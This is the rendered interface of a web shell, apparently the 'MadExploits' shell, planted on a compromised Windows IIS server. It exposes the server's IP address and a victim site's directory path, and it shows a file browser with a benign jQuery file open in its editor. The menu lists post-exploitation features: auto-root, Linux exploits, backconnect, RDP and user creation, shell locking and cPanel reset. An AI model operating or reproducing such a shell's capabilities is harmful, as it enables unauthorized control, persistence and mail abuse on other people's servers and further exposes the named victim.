Windows NT 5XH5ME 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
: | : 52.14.2.251
Cant Read [ /etc/named.conf ]
8.0.30
IWPD_574(rhy10449)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
D: /
Inetpub /
vhosts /
rhythmmedical.in /
httpdocs /
superadm /
bower_components /
jquery /
src /
core /
[ HOME SHELL ]
Name
Size
Permission
Action
var
[ DIR ]
drwxrwxrwx
DOMEval.js
292
B
-rw-rw-rw-
access.js
1.23
KB
-rw-rw-rw-
init.js
3.24
KB
-rw-rw-rw-
nodeName.js
178
B
-rw-rw-rw-
parseHTML.js
1.57
KB
-rw-rw-rw-
ready-no-deferred.js
2.18
KB
-rw-rw-rw-
ready.js
2.05
KB
-rw-rw-rw-
readyException.js
168
B
-rw-rw-rw-
stripAndCollapse.js
384
B
-rw-rw-rw-
support.js
631
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : support.js
define( [ "../var/document", "../var/support" ], function( document, support ) { "use strict"; // Support: Safari 8 only // In Safari 8 documents created via document.implementation.createHTMLDocument // collapse sibling forms: the second one becomes a child of the first one. // Because of that, this security measure has to be disabled in Safari 8. // https://bugs.webkit.org/show_bug.cgi?id=137337 support.createHTMLDocument = ( function() { var body = document.implementation.createHTMLDocument( "" ).body; body.innerHTML = "<form></form><form></form>"; return body.childNodes.length === 2; } )(); return support; } );
Close